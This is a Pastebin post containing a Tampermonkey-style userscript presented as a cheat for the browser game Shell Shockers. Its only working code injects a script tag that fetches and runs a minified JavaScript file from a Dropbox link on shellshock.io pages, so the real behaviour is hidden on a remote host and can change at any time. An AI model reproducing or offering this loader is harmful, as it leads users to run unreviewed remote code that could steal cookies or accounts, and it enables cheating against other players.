BlitzBro00

shell shockers hack OP 2020

Dec 1st, 2020 (edited)
4,613
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.49 KB | None | 0 0
  1. here's the code :)
  2.  
  3.  
  4. // ==UserScript==
  5. // @name Shellshock.io hack 2020 OP
  6. // @version 3.0
  7. // @description Shellshock hack
  8. // @author Blitzbro00
  9. // @match *://shellshock.io/*
  10. // @grant none
  11. // @namespace https://greasyfork.org/users/190962
  12. // ==/UserScript==
  13.  
  14. var script = document.createElement('script');
  15. script.src = '//dl.dropboxusercontent.com/s/wjuz0lovxa00an3/5shellshock.min.js';
  16. script.type = 'text/javascript';
  17. document.body.appendChild(script);
Advertisement
Add Comment
Please, Sign In to add comment